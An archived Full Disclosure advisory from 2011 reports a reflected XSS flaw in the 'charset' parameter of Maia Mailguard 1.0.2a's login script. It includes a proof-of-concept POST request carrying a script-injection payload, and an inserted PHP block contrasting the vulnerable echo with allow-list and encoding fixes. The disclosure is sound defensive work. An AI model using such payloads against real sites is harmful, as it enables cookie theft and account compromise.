Full Disclosure mailing list archives

Maia Mailguard is affected by a XSS vulnerability in version 1.0.2a


From: Mario López Jiménez <mlopez () buguroo com>
Date: Thu, 7 Apr 2011 17:11:59 +0200

===================================
BUGUROO SECURITY SYSTEMS ALERT
- Advisory: http://buguroo.com/adv/Buguroo_ADV_2011-001.txt
- Discovered on: March 29th, 2011
- Discovered by: Mario Lopez (mlopez (at) buguroo (dot) com)
- Severity: 5/10
===================================

1. VULNERABILITY
----------------------------
Maia Mailguard is affected by an XSS vulnerability in version 1.0.2a.

2. BACKGROUND
----------------------------
Maia Mailguard is a web-based interface and management system based on the
popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl and
PHP, Maia Mailguard gives end-users control over how their mail is processed
by virus scanners and spam filters, while giving mail administrators the
power to configure site-wide defaults and limits.

3. DESCRIPTION
----------------------------
Any user has the ability to inject and execute arbitrary HTML and JavaScript
code in the application.

The vulnerability exists because the "xlogin.php" script fails to properly
sanitize the user-supplied "charset" parameter before echoing it into the
page. Successful exploitation of this vulnerability could result in a
compromise of the application, theft of cookie-based authentication
credentials, or disclosure or modification of sensitive data.
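The following is an added example written for this advisory, not Maia Mailguard's own code. It assumes (as the proof of concept in section 4 implies) that the login page echoes the submitted "charset" form field back into an HTML attribute; the function names, the meta-tag context and the list of supported character sets are hypothetical. It shows the vulnerable pattern beside two complementary fixes: allow-listing the value and HTML-encoding whatever is still echoed.

```php
<?php
// Added example, not Maia Mailguard's code. Function names and the
// character-set list are assumptions for illustration.

// Vulnerable pattern: the raw request value is interpolated into markup,
// so a value such as  "></style><script>...  closes the attribute and the
// enclosing element and injects a live <script> element.
function render_charset_vulnerable(string $charset): string
{
    return '<meta http-equiv="Content-Type" content="text/html; charset='
        . $charset . '">';
}

// Fix 1: allow-list the value against the character sets the application
// actually supports and fall back to a safe default for anything else.
const ALLOWED_CHARSETS = ['UTF-8', 'ISO-8859-1', 'ISO-8859-15', 'US-ASCII'];

function normalize_charset(?string $charset): string
{
    if ($charset === null) {
        return 'UTF-8';
    }
    $upper = strtoupper(trim($charset));
    return in_array($upper, ALLOWED_CHARSETS, true) ? $upper : 'UTF-8';
}

// Fix 2: HTML-encode anything that is still echoed, quotes included
// (ENT_QUOTES), so a value can never terminate the attribute it sits in.
// Applying both fixes means the encoding is a safety net, not the only line.
function render_charset_safe(?string $charset): string
{
    $value = htmlspecialchars(normalize_charset($charset),
                              ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<meta http-equiv="Content-Type" content="text/html; charset='
        . $value . '">';
}

// Constructed input mirroring the advisory's proof-of-concept payload.
$payload = '"></style><script>alert(11700)</script>';

echo render_charset_vulnerable($payload), PHP_EOL;
// The output contains an executable <script> element.

echo render_charset_safe($payload), PHP_EOL;
// The payload is rejected by the allow-list; the page declares UTF-8.

echo render_charset_safe('iso-8859-15'), PHP_EOL;
// A legitimate value is normalised and passed through as ISO-8859-15.
```

Run it with `php example.php`. The allow-list is the primary control here because a charset is a closed vocabulary and there is no reason to accept free text; the encoding step remains useful for fields that genuinely are free text, and it is also what keeps the page safe if the allow-list is ever bypassed by a later code change.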

4. PROOF OF CONCEPT
----------------------------
An attacker can exploit this vulnerability from a browser. An example PoC
request is as follows:

POST https://example.com/xlogin.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,
application/x-shockwave-flash, application/xaml+xml,
application/vnd.ms-xpsdocument, application/x-ms-xbap,
application/x-ms-application, */*
Referer: https://example.com/login.php
Accept-Language: es
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;
.NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Content-Type: application/x-www-form-urlencoded
Host: example.com
Content-Length: 63
Connection: Keep-Alive
Cache-Control: no-cache

super=&charset="></style><script>alert(11700)</script>&username=user&pwd=pass&submit=+Login+

5. BUSINESS IMPACT
----------------------------
Theft of administrator authentication credentials can damage the corporation's image.

6. SYSTEMS AFFECTED
----------------------------
Maia Mailguard v1.0.2a and prior (all).

7. SOLUTION
----------------------------
Sanitize user-supplied input (the "charset" parameter) before it is echoed into the page.

8. REFERENCES
----------------------------
http://www.maiamailguard.com
http://blog.buguroo.com

9. CREDITS
----------------------------
This vulnerability has been discovered and reported by Mario Lopez Jimenez,
Senior Security Analyst with Buguroo Offensive Security (mlopez (at) buguroo
(dot) com).

10. DISCLOSURE TIMELINE
----------------------------
2011-03-29: Vulnerability was identified
2011-03-31: Vendor contacted
2011-04-01: Response and correction started.
2011-04-03: Update Available.
2011-04-07: Buguroo publishes this security advisory.

11. ABOUT BUGUROO
----------------------------
Buguroo is a Spanish offensive security company founded in 2007, exclusively
dedicated to the development of IT security solutions by means of its own
software factory. We are a 100% R+D company under continuous evolution and
technological renovation, enabling us to stay at the vanguard of our sector
and to offer a first class service worldwide.

12. DISCLAIMER
----------------------------
Buguroo Offensive Security, S.L. assumes no liability for the use of the
information provided in this advisory. This advisory was released in an
effort to help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

-- 
Mario López Jiménez
Buguroo Offensive Security
www.buguroo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/